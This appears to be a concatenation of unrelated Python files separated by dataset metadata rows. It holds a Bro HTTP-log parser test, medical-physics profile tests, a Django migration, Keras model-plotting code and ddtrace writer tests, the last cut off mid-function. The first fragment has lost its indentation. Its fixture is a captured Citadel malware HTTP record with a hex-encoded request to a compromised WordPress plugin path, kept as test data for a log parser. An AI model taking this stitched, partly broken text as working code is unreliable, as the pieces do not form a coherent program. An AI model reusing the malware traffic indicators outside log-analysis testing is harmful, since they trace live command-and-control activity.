#intake a log file (/parser.bro/citadelsample/http.log)
#checks no error is thrown by calling a file an
#make example log data file path relative to the project
directory = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))
filename = os.path.join(directory, '../../data/broData/ExploitExample/http.log')
exceptionFile = os.path.join(directory, '../../testdata/badBroLog.log')
#this is to deal with the log file length exceeding the TestCase allowable length
unittest.TestCase.maxDiff = None
class BroParserTests(unittest.TestCase):
knownValues = ( (filename
,{'host': 'graphicstreeme.com', 'method': 'GET', 'idOrigPort': 49161, 'password': '-', 'uri': '/wp-content/plugins/theme-check/misc.php?572A56481F78D91A71F483FAC3626A6F89E2D4AFC98B8E4D38D901CB11D6B924D13EDDCA9E1C27D91D71987B1051AD6B2F9BEA566F4F3045C43796BFEC4C8AF763F838783B32EE6F30599814D4C07EDA1CB04100BE5491A459ED2919E1E7F57FFBF78B983B91D398700387E8A31738D900E2E32075CF665A12BD8AD4718F7B32F695E398862E28B15DE8A44AA7A63AF0648C44373229C87CD8566B3E64F4677A1B79C1DB1C9D9AB52836A8230F62BBCB144F4B8CA8A44BAAC4D35497A512995BC1865425D0F0C5E4380181F73DE7690B7680D4FA05D2A419B66DA62943BDF7276B100B5DC2B1F39D53847F3768053ED3C273A328CEF9BEBBC84D28FDEAB69E114D3DF889E54074029D8232027596623990647E1D01D1D402657382B1F51D05F5B272ED3C7615A7D0CD647F85F1FA10E55F7F1749565525526D227D5941A9867E59E45879712590AACA4336088056A91FF3A3129B1384811DE40F749EB09896F91704F83CB5A347EBE4D3B5D2D45851DF', 'info_code': '-', 'info_msg': '-', 'requestBodyLen': 0, 'trans_depth': 2, 'id.orig_p': 49161, 'resp_fuids': 'FWdp4h4pEuJOLZrJA9', 'statusCode': 'OK', 'resp_mime_types': 'text/plain', 'username': '-', 'ts': 1450372321.641135, 'epochTime': 1450372321.641135, 'referrer': '-', 'idRespPort': 80, 'request_body_len': 0, 'id.orig_h': '172.16.25.128', 'orig_mime_types': '-', 'orig_fuids': '-', 'id.resp_h': '182.50.130.156', 'idOrigHost': '172.16.25.128', 'status_msg': 'OK', 'user_agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', 'status_code': 200, 'filename': '-', 'transDepth': 2, 'responseBodyLen': 25, 'uid': 'CCZDtw19H01FglVpy1', 'id.resp_p': 80, 'tags': '(empty)', 'userAgent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', 'fullUrl': 'https:\\graphicstreeme.com/wp-content/plugins/theme-check/misc.php?572A56481F78D91A71F483FAC3626A6F89E2D4AFC98B8E4D38D901CB11D6B924D13EDDCA9E1C27D91D71987B1051AD6B2F9BEA566F4F3045C43796BFEC4C8AF763F838783B32EE6F30599814D4C07EDA1CB04100BE5491A459ED2919E1E7F57FFBF78B983B91D398700387E8A31738D900E2E32075CF665A12BD8AD4718F7B32F695E398862E28B15DE8A44AA7A63AF0648C44373229C87CD8566B3E64F4677A1B79C1DB1C9D9AB52836A8230F62BBCB144F4B8CA8A44BAAC4D35497A512995BC1865425D0F0C5E4380181F73DE7690B7680D4FA05D2A419B66DA62943BDF7276B100B5DC2B1F39D53847F3768053ED3C273A328CEF9BEBBC84D28FDEAB69E114D3DF889E54074029D8232027596623990647E1D01D1D402657382B1F51D05F5B272ED3C7615A7D0CD647F85F1FA10E55F7F1749565525526D227D5941A9867E59E45879712590AACA4336088056A91FF3A3129B1384811DE40F749EB09896F91704F83CB5A347EBE4D3B5D2D45851DF', 'response_body_len': 25, 'idRespHost': '182.50.130.156', 'proxied': '-'}
),
)
rawLogLine = "1407536946.250769 CuXBEZ1N3EwxNX5Frl 192.168.57.105 44688 192.168.57.110 80 1 POST citadel.com /file.php - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) 122 5280 200 OK - - - (empty) - - - FZrQg1NzTvumR5iG - FsWWXv2NaAihisYjY -"
def test_basicBroNormalizedParser(self):
normData = ParsingNormalizationPyLogic() | 99.357143 | 2,585 | 0.798706 |
acfb5740e9b1d01242955fabb8273e34bc013293 | 11,116 | py | Python | tests/labs/paulking/test_profile.py | pymedphys/pymedphys-archive-2019 | 6bb7c8d0da2e93ff56469bb47e65b15ece2ea25e | [
"Apache-2.0"
] | 1 | 2020-12-20T14:13:56.000Z | 2020-12-20T14:13:56.000Z | tests/labs/paulking/test_profile.py | pymedphys/pymedphys-archive-2019 | 6bb7c8d0da2e93ff56469bb47e65b15ece2ea25e | [
"Apache-2.0"
] | null | null | null | tests/labs/paulking/test_profile.py | pymedphys/pymedphys-archive-2019 | 6bb7c8d0da2e93ff56469bb47e65b15ece2ea25e | [
"Apache-2.0"
] | 1 | 2020-12-20T14:14:00.000Z | 2020-12-20T14:14:00.000Z | # Copyright (C) 2019 Paul King, Simon Biggs
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The following needs to be removed before leaving labs
# pylint: skip-file
""" Test profile. """
import os
import numpy as np
from pymedphys._data import download
from pymedphys.labs.paulking.profile import Profile
PROFILER = [
(-16.4, 0.22),
(-16, 0.3),
(-15.6, 0.28),
(-15.2, 0.3),
(-14.8, 0.36),
(-14.4, 0.38),
(-14, 0.41),
(-13.6, 0.45),
(-13.2, 0.47),
(-12.8, 0.51),
(-12.4, 0.55),
(-12, 0.62),
(-11.6, 0.67),
(-11.2, 0.74),
(-10.8, 0.81),
(-10.4, 0.91),
(-10, 0.97),
(-9.6, 1.12),
(-9.2, 1.24),
(-8.8, 1.4),
(-8.4, 1.56),
(-8, 1.75),
(-7.6, 2.06),
(-7.2, 2.31),
(-6.8, 2.56),
(-6.4, 3.14),
(-6, 3.83),
(-5.6, 4.98),
(-5.2, 8.17),
(-4.8, 40.6),
(-4.4, 43.34),
(-4, 44.17),
(-3.6, 44.44),
(-3.2, 44.96),
(-2.8, 44.18),
(-2.4, 45.16),
(-2, 45.54),
(-1.6, 45.07),
(-1.2, 45.28),
(-0.8, 45.27),
(-0.4, 44.57),
(0, 45.23),
(0.4, 45.19),
(0.8, 45.18),
(1.2, 45.37),
(1.6, 45.34),
(2, 45.39),
(2.4, 45.32),
(2.8, 45.25),
(3.2, 44.84),
(3.6, 44.76),
(4, 44.23),
(4.4, 43.22),
(4.8, 39.14),
(5.2, 7.98),
(5.6, 4.89),
(6, 3.71),
(6.4, 3.11),
(6.8, 2.59),
(7.2, 2.27),
(7.6, 1.95),
(8, 1.71),
(8.4, 1.46),
(8.8, 1.35),
(9.2, 1.18),
(9.6, 1.11),
(10, 0.93),
(10.4, 0.87),
(10.8, 0.78),
(11.2, 0.7),
(11.6, 0.64),
(12, 0.6),
(12.4, 0.54),
(12.8, 0.49),
(13.2, 0.47),
(13.6, 0.43),
(14, 0.4),
(14.4, 0.39),
(14.8, 0.34),
(15.2, 0.33),
(15.6, 0.32),
(16, 0.3),
(16.4, 0.3),
]
WEDGED = [
(-16.4, 0.27),
(-16, 0.31),
(-15.6, 0.29),
(-15.2, 0.29),
(-14.8, 0.32),
(-14.4, 0.33),
(-14, 0.35),
(-13.6, 0.38),
(-13.2, 0.4),
(-12.8, 0.44),
(-12.4, 0.46),
(-12, 0.51),
(-11.6, 0.55),
(-11.2, 0.6),
(-10.8, 0.65),
(-10.4, 0.7),
(-10, 0.74),
(-9.6, 0.84),
(-9.2, 0.94),
(-8.8, 1.04),
(-8.4, 1.14),
(-8, 1.25),
(-7.6, 1.45),
(-7.2, 1.6),
(-6.8, 1.78),
(-6.4, 2.14),
(-6, 2.66),
(-5.6, 3.62),
(-5.2, 6.54),
(-4.8, 17.55),
(-4.4, 20.07),
(-4, 21.37),
(-3.6, 22.19),
(-3.2, 23.1),
(-2.8, 23.74),
(-2.4, 24.56),
(-2, 25.49),
(-1.6, 26.35),
(-1.2, 27),
(-0.8, 28.06),
(-0.4, 28.89),
(0, 29.8),
(0.4, 30.61),
(0.8, 31.4),
(1.2, 32.53),
(1.6, 33.06),
(2, 34.15),
(2.4, 34.85),
(2.8, 35.65),
(3.2, 36.6),
(3.6, 37.04),
(4, 37.45),
(4.4, 36.72),
(4.8, 30.93),
(5.2, 10.06),
(5.6, 5.43),
(6, 3.71),
(6.4, 3.01),
(6.8, 2.52),
(7.2, 2.19),
(7.6, 1.9),
(8, 1.7),
(8.4, 1.48),
(8.8, 1.35),
(9.2, 1.19),
(9.6, 1.09),
(10, 0.93),
(10.4, 0.89),
(10.8, 0.78),
(11.2, 0.72),
(11.6, 0.65),
(12, 0.6),
(12.4, 0.55),
(12.8, 0.5),
(13.2, 0.48),
(13.6, 0.45),
(14, 0.41),
(14.4, 0.4),
(14.8, 0.35),
(15.2, 0.33),
(15.6, 0.32),
(16, 0.31),
(16.4, 0.3),
]
def get_data_file(filename):
return download.get_file_within_data_zip("paulking_test_data.zip", filename)
def test_init():
assert np.allclose(Profile(x=[0], y=[0]).x, [0])
def test_interp():
assert Profile().interp is None
assert np.isclose(Profile(x=[0, 1], y=[0, 1]).interp(0.5), 0.5)
def test_magic_methods():
assert not Profile()
# __len__
assert len(Profile().from_tuples(PROFILER)) == 83
# __eq__
assert Profile() == Profile()
assert Profile(x=[], y=[]) == Profile()
assert Profile(x=[0], y=[0]) != Profile()
# __copy__
original = Profile()
same = original
assert same == original
# __str__
empty_profile = Profile()
print(empty_profile)
profiler = Profile().from_tuples(PROFILER)
assert profiler.__str__()
# __add__, __radd__, __iadd__
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.get_y(0), (profiler + 2).get_y(2))
# __sub__, __rsub__, __isub__
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.get_y(0), (profiler - 2).get_y(-2))
# __mul__, __rmul__, __imul__
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(4 * sum(profiler.y), sum((4 * profiler).y))
assert np.isclose(4 * sum(profiler.y), sum((profiler * 4).y))
ref = 4 * sum(profiler.y)
profiler *= 4
assert np.isclose(sum(profiler.y), ref)
def test_from_lists():
empty = Profile()
also_empty = empty
also_empty.from_lists([], [])
assert empty == also_empty
def test_from_tuples():
empty = Profile()
profiler = empty.from_tuples(PROFILER)
assert len(profiler.x) == len(PROFILER)
assert profiler.x[0] == PROFILER[0][0]
def test_from_pulse():
pulse = 4 * Profile().from_pulse(0.0, 1, (-5, 5), 0.1)
assert np.isclose(sum(pulse.y), 40)
def test_from_snc_profiler():
file_name = get_data_file("test_varian_open.prs")
x_profile = Profile().from_snc_profiler(file_name, "tvs")
y_profile = Profile().from_snc_profiler(file_name, "rad")
assert np.isclose(x_profile.get_y(0), 45.50562901780488)
assert np.isclose(y_profile.get_y(0), 45.50562901780488)
assert x_profile.meta["SSD"] == y_profile.meta["SSD"]
def test_from_narrow_png():
file_name = get_data_file("FilmCalib_EBT_vert_strip.png")
png = Profile().from_narrow_png(file_name)
assert np.isclose(png.get_y(0), 0.609074819347117)
def test_get_y():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.get_y(0), 45.23)
def test_get_x():
profiler = Profile().from_tuples(PROFILER)
assert np.allclose(profiler.get_x(10), (-5.17742830712, 5.1740693196))
def test_get_increment():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.get_increment(), 0.4)
def test_slice_segment():
profiler = Profile().from_tuples(PROFILER)
# NO POINTS
no_points = profiler.slice_segment(start=1, stop=0)
assert np.array_equal(no_points.x, [])
assert np.array_equal(no_points.y, [])
# ONE POINT
profiler = Profile().from_tuples(PROFILER)
one_point = profiler.slice_segment(start=0, stop=0)
assert np.array_equal(one_point.x, [0])
assert np.array_equal(one_point.y, [45.23])
# ALL POINTS
profiler = Profile().from_tuples(PROFILER)
all_points = profiler.slice_segment()
assert np.array_equal(all_points.x, profiler.x)
assert np.array_equal(all_points.y, profiler.y)
def test_resample_x():
profiler = Profile().from_tuples(PROFILER, meta={"depth": 10})
assert profiler.meta["depth"] == 10
assert np.isclose(profiler.interp(0), profiler.resample_x(0.1).interp(0))
assert np.isclose(profiler.interp(6.372), profiler.resample_x(0.1).interp(6.372))
resampled = profiler.resample_x(0.1)
increments = np.diff([i for i in resampled.x])
assert np.allclose(increments, 0.1)
assert np.isclose(resampled.y[0], profiler.y[0])
def test_resample_y():
profiler = Profile().from_tuples(PROFILER)
assert len(profiler.resample_y(0.5)) > len(profiler.resample_y(1))
def test_make_normal_y():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.make_normal_y(x=0).get_y(0), 1.0)
def test_get_edges():
profiler = Profile().from_tuples(PROFILER)
assert np.allclose(profiler.get_edges(), (-5.2, 4.8))
assert len(profiler) == len(PROFILER)
def test_make_normal_x():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.make_normal_x().x[0], -3.1538461538461533)
profiler = Profile().from_tuples(PROFILER)
assert len(PROFILER) == len(profiler.make_normal_x().x)
def test_slice_umbra():
profiler = Profile().from_tuples(PROFILER).resample_x(0.1)
profiler_length = len(profiler)
umbra = profiler.slice_umbra()
assert len(umbra) < profiler_length
def test_slice_penumbra():
profiler = Profile().from_tuples(PROFILER).resample_x(0.1)
lt_penum, rt_penum = profiler.slice_penumbra()
assert np.all(lt_penum.x < 0)
assert np.all(rt_penum.x > 0)
assert np.all(lt_penum.y < profiler.get_y(0))
assert np.all(rt_penum.y < profiler.get_y(0))
def test_slice_shoulders():
profiler = Profile().from_tuples(PROFILER).resample_x(0.1)
lt_should, rt_should = profiler.slice_shoulders()
assert np.all(lt_should.x < min(rt_should.x))
assert np.all(rt_should.x > max(lt_should.x))
def test_slice_tails():
profiler = Profile().from_tuples(PROFILER).resample_x(0.1)
lt_tail, rt_tail = profiler.slice_tails()
assert np.all(lt_tail.x < min(rt_tail.x))
assert np.all(rt_tail.x > max(lt_tail.x))
def test_get_flatness():
profiler = Profile().from_tuples(PROFILER)
profiler = profiler.resample_x(0.1)
assert np.isclose(profiler.get_flatness(), 0.03042644213284108)
def test_get_symmetry():
profiler = Profile().from_tuples(PROFILER)
profiler = profiler.resample_x(0.1)
symmetry = profiler.get_symmetry()
assert np.isclose(symmetry, 0.024152376510553037)
def test_make_symmetric():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.make_symmetric().get_symmetry(), 0.0)
def test_make_centered():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(np.sum(profiler.make_centered().get_edges()), 0.0)
def test_make_flipped():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.get_y(3), profiler.make_flipped().get_y(-3))
def test_align_to():
profiler = Profile().from_tuples(PROFILER)
assert np.isclose(profiler.align_to(profiler + (2)).x[0], profiler.x[0] + 2)
def test_cross_calibrate():
reference_file_name = get_data_file("FilmCalib.prs")
measured_file_name = get_data_file("FilmCalib_EBT_vert_strip.png")
cal_curve = Profile().cross_calibrate(reference_file_name, measured_file_name)
assert min(cal_curve.x) <= 1
assert max(cal_curve.x) >= 0
| 26.529833 | 86 | 0.572058 |
acfb576a9916634d62edf7a1256c2a1ee7e87576 | 1,173 | py | Python | ava/common/migrations/0003_auto_20180504_0511.py | patrickporto/elearning | b746fcfa5dadc77eaa0b3e20ff006f386b9dae67 | [
"MIT"
] | null | null | null | ava/common/migrations/0003_auto_20180504_0511.py | patrickporto/elearning | b746fcfa5dadc77eaa0b3e20ff006f386b9dae67 | [
"MIT"
] | null | null | null | ava/common/migrations/0003_auto_20180504_0511.py | patrickporto/elearning | b746fcfa5dadc77eaa0b3e20ff006f386b9dae67 | [
"MIT"
] | null | null | null | # Generated by Django 2.0.5 on 2018-05-04 05:11
import common.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('common', '0002_auto_20180504_0458'),
]
operations = [
migrations.AlterModelManagers(
name='usuario',
managers=[
('objects', common.models.UserManager()),
],
),
migrations.AlterField(
model_name='turma',
name='professor',
field=models.ForeignKey(limit_choices_to={'papel': 1}, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='usuario',
name='foto',
field=models.ImageField(default='https://api.adorable.io/avatars/192/abott@adorable.png', upload_to='avatars/'),
),
migrations.AlterField(
model_name='usuario',
name='papel',
field=models.IntegerField(choices=[(1, 'Professor'), (2, 'Aluno'), (0, 'Admin')], default=0),
),
]
| 30.868421 | 141 | 0.59335 |
acfb589f51b5ead619bc8bfc086a4764d73c111c | 12,680 | py | Python | tensorflow/python/keras/utils/vis_utils.py | jonah-kohn/tensorflow | 8f278b5c183b485f038b0504308929b4e3bde5a7 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/keras/utils/vis_utils.py | jonah-kohn/tensorflow | 8f278b5c183b485f038b0504308929b4e3bde5a7 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/keras/utils/vis_utils.py | jonah-kohn/tensorflow | 8f278b5c183b485f038b0504308929b4e3bde5a7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
# pylint: disable=g-import-not-at-top
"""Utilities related to model visualization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
from tensorflow.python.keras.utils.io_utils import path_to_string
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
try:
# pydot-ng is a fork of pydot that is better maintained.
import pydot_ng as pydot
except ImportError:
# pydotplus is an improved version of pydot
try:
import pydotplus as pydot
except ImportError:
# Fall back on pydot if necessary.
try:
import pydot
except ImportError:
pydot = None
def check_pydot():
"""Returns True if PyDot and Graphviz are available."""
if pydot is None:
return False
try:
# Attempt to create an image of a blank graph
# to check the pydot/graphviz installation.
pydot.Dot.create(pydot.Dot())
return True
except (OSError, pydot.InvocationException):
return False
def is_wrapped_model(layer):
from tensorflow.python.keras.engine import functional
from tensorflow.python.keras.layers import wrappers
return (isinstance(layer, wrappers.Wrapper) and
isinstance(layer.layer, functional.Functional))
def add_edge(dot, src, dst):
if not dot.get_edge(src, dst):
dot.add_edge(pydot.Edge(src, dst))
@keras_export('keras.utils.model_to_dot')
def model_to_dot(model,
show_shapes=False,
show_dtype=False,
show_layer_names=True,
rankdir='TB',
expand_nested=False,
dpi=96,
subgraph=False):
"""Convert a Keras model to dot format.
Arguments:
model: A Keras model instance.
show_shapes: whether to display shape information.
show_dtype: whether to display layer dtypes.
show_layer_names: whether to display layer names.
rankdir: `rankdir` argument passed to PyDot,
a string specifying the format of the plot:
'TB' creates a vertical plot;
'LR' creates a horizontal plot.
expand_nested: whether to expand nested models into clusters.
dpi: Dots per inch.
subgraph: whether to return a `pydot.Cluster` instance.
Returns:
A `pydot.Dot` instance representing the Keras model or
a `pydot.Cluster` instance representing nested model if
`subgraph=True`.
Raises:
ImportError: if graphviz or pydot are not available.
"""
from tensorflow.python.keras.layers import wrappers
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.engine import functional
if not check_pydot():
message = (
'Failed to import pydot. You must `pip install pydot` '
'and install graphviz (https://graphviz.gitlab.io/download/), ',
'for `pydotprint` to work.')
if 'IPython.core.magics.namespace' in sys.modules:
# We don't raise an exception here in order to avoid crashing notebook
# tests where graphviz is not available.
print(message)
return
else:
raise ImportError(message)
if subgraph:
dot = pydot.Cluster(style='dashed', graph_name=model.name)
dot.set('label', model.name)
dot.set('labeljust', 'l')
else:
dot = pydot.Dot()
dot.set('rankdir', rankdir)
dot.set('concentrate', True)
dot.set('dpi', dpi)
dot.set_node_defaults(shape='record')
sub_n_first_node = {}
sub_n_last_node = {}
sub_w_first_node = {}
sub_w_last_node = {}
layers = model.layers
if not model._is_graph_network:
node = pydot.Node(str(id(model)), label=model.name)
dot.add_node(node)
return dot
elif isinstance(model, sequential.Sequential):
if not model.built:
model.build()
layers = super(sequential.Sequential, model).layers
# Create graph nodes.
for i, layer in enumerate(layers):
layer_id = str(id(layer))
# Append a wrapped layer's label to node's label, if it exists.
layer_name = layer.name
class_name = layer.__class__.__name__
if isinstance(layer, wrappers.Wrapper):
if expand_nested and isinstance(layer.layer,
functional.Functional):
submodel_wrapper = model_to_dot(layer.layer,
show_shapes,
show_dtype,
show_layer_names,
rankdir,
expand_nested,
subgraph=True)
# sub_w : submodel_wrapper
sub_w_nodes = submodel_wrapper.get_nodes()
sub_w_first_node[layer.layer.name] = sub_w_nodes[0]
sub_w_last_node[layer.layer.name] = sub_w_nodes[-1]
dot.add_subgraph(submodel_wrapper)
else:
layer_name = '{}({})'.format(layer_name, layer.layer.name)
child_class_name = layer.layer.__class__.__name__
class_name = '{}({})'.format(class_name, child_class_name)
if expand_nested and isinstance(layer, functional.Functional):
submodel_not_wrapper = model_to_dot(layer,
show_shapes,
show_dtype,
show_layer_names,
rankdir,
expand_nested,
subgraph=True)
# sub_n : submodel_not_wrapper
sub_n_nodes = submodel_not_wrapper.get_nodes()
sub_n_first_node[layer.name] = sub_n_nodes[0]
sub_n_last_node[layer.name] = sub_n_nodes[-1]
dot.add_subgraph(submodel_not_wrapper)
# Create node's label.
if show_layer_names:
label = '{}: {}'.format(layer_name, class_name)
else:
label = class_name
# Rebuild the label as a table including the layer's dtype.
if show_dtype:
def format_dtype(dtype):
if dtype is None:
return '?'
else:
return str(dtype)
label = '%s|%s' % (label, format_dtype(layer.dtype))
# Rebuild the label as a table including input/output shapes.
if show_shapes:
def format_shape(shape):
return str(shape).replace(str(None), '?')
try:
outputlabels = format_shape(layer.output_shape)
except AttributeError:
outputlabels = '?'
if hasattr(layer, 'input_shape'):
inputlabels = format_shape(layer.input_shape)
elif hasattr(layer, 'input_shapes'):
inputlabels = ', '.join(
[format_shape(ishape) for ishape in layer.input_shapes])
else:
inputlabels = '?'
label = '%s\n|{input:|output:}|{{%s}|{%s}}' % (label,
inputlabels,
outputlabels)
if not expand_nested or not isinstance(
layer, functional.Functional):
node = pydot.Node(layer_id, label=label)
dot.add_node(node)
# Connect nodes with edges.
for layer in layers:
layer_id = str(id(layer))
for i, node in enumerate(layer._inbound_nodes):
node_key = layer.name + '_ib-' + str(i)
if node_key in model._network_nodes:
for inbound_layer in nest.flatten(node.inbound_layers):
inbound_layer_id = str(id(inbound_layer))
if not expand_nested:
assert dot.get_node(inbound_layer_id)
assert dot.get_node(layer_id)
add_edge(dot, inbound_layer_id, layer_id)
else:
# if inbound_layer is not Model or wrapped Model
if (not isinstance(inbound_layer,
functional.Functional) and
not is_wrapped_model(inbound_layer)):
# if current layer is not Model or wrapped Model
if (not isinstance(layer, functional.Functional) and
not is_wrapped_model(layer)):
assert dot.get_node(inbound_layer_id)
assert dot.get_node(layer_id)
add_edge(dot, inbound_layer_id, layer_id)
# if current layer is Model
elif isinstance(layer, functional.Functional):
add_edge(dot, inbound_layer_id,
sub_n_first_node[layer.name].get_name())
# if current layer is wrapped Model
elif is_wrapped_model(layer):
add_edge(dot, inbound_layer_id, layer_id)
name = sub_w_first_node[layer.layer.name].get_name()
add_edge(dot, layer_id, name)
# if inbound_layer is Model
elif isinstance(inbound_layer, functional.Functional):
name = sub_n_last_node[inbound_layer.name].get_name()
if isinstance(layer, functional.Functional):
output_name = sub_n_first_node[layer.name].get_name()
add_edge(dot, name, output_name)
else:
add_edge(dot, name, layer_id)
# if inbound_layer is wrapped Model
elif is_wrapped_model(inbound_layer):
inbound_layer_name = inbound_layer.layer.name
add_edge(dot,
sub_w_last_node[inbound_layer_name].get_name(),
layer_id)
return dot
@keras_export('keras.utils.plot_model')
def plot_model(model,
to_file='model.png',
show_shapes=False,
show_dtype=False,
show_layer_names=True,
rankdir='TB',
expand_nested=False,
dpi=96):
"""Converts a Keras model to dot format and save to a file.
Example:
```python
input = tf.keras.Input(shape=(100,), dtype='int32', name='input')
x = tf.keras.layers.Embedding(
output_dim=512, input_dim=10000, input_length=100)(input)
x = tf.keras.layers.LSTM(32)(x)
x = tf.keras.layers.Dense(64, activation='relu')(x)
x = tf.keras.layers.Dense(64, activation='relu')(x)
x = tf.keras.layers.Dense(64, activation='relu')(x)
output = tf.keras.layers.Dense(1, activation='sigmoid', name='output')(x)
model = tf.keras.Model(inputs=[input], outputs=[output])
dot_img_file = '/tmp/model_1.png'
tf.keras.utils.plot_model(model, to_file=dot_img_file, show_shapes=True)
```
Arguments:
model: A Keras model instance
to_file: File name of the plot image.
show_shapes: whether to display shape information.
show_dtype: whether to display layer dtypes.
show_layer_names: whether to display layer names.
rankdir: `rankdir` argument passed to PyDot,
a string specifying the format of the plot:
'TB' creates a vertical plot;
'LR' creates a horizontal plot.
expand_nested: Whether to expand nested models into clusters.
dpi: Dots per inch.
Returns:
A Jupyter notebook Image object if Jupyter is installed.
This enables in-line display of the model plots in notebooks.
"""
dot = model_to_dot(model,
show_shapes=show_shapes,
show_dtype=show_dtype,
show_layer_names=show_layer_names,
rankdir=rankdir,
expand_nested=expand_nested,
dpi=dpi)
to_file = path_to_string(to_file)
if dot is None:
return
_, extension = os.path.splitext(to_file)
if not extension:
extension = 'png'
else:
extension = extension[1:]
# Save image to disk.
dot.write(to_file, format=extension)
# Return the image as a Jupyter Image object, to be displayed in-line.
# Note that we cannot easily detect whether the code is running in a
# notebook, and thus we always return the Image if Jupyter is available.
if extension != 'pdf':
try:
from IPython import display
return display.Image(filename=to_file)
except ImportError:
pass
| 36.541787 | 80 | 0.623738 |
acfb5a226c165aedfabf52744be6be9368740a0d | 19,460 | py | Python | tests/tracer/test_writer.py | KDWSS/dd-trace-py | 6d859bec403347f7c1e7efd039210908b562741e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | tests/tracer/test_writer.py | KDWSS/dd-trace-py | 6d859bec403347f7c1e7efd039210908b562741e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | tests/tracer/test_writer.py | KDWSS/dd-trace-py | 6d859bec403347f7c1e7efd039210908b562741e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | import os
import socket
import tempfile
import threading
import time
import mock
import msgpack
import pytest
from six.moves import BaseHTTPServer
from six.moves import socketserver
from ddtrace.constants import KEEP_SPANS_RATE_KEY
from ddtrace.internal.compat import PY3
from ddtrace.internal.compat import get_connection_response
from ddtrace.internal.compat import httplib
from ddtrace.internal.uds import UDSHTTPConnection
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.internal.writer import Response
from ddtrace.internal.writer import _human_size
from ddtrace.span import Span
from tests.utils import AnyInt
from tests.utils import BaseTestCase
from tests.utils import override_env
class DummyOutput:
def __init__(self):
self.entries = []
def write(self, message):
self.entries.append(message)
def flush(self):
pass
class AgentWriterTests(BaseTestCase):
N_TRACES = 11
def test_metrics_disabled(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.stop()
writer.join()
statsd.increment.assert_not_called()
statsd.distribution.assert_not_called()
def test_metrics_bad_endpoint(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_metrics_trace_too_big(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.write(
[Span(tracer=None, name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
)
writer.stop()
writer.join()
statsd.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
mock.call("datadog.tracer.buffer.dropped.traces", 1, tags=["reason:t_too_big"]),
mock.call("datadog.tracer.buffer.dropped.bytes", AnyInt(), tags=["reason:t_too_big"]),
mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
],
any_order=True,
)
def test_metrics_multi(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
for i in range(10):
writer.write(
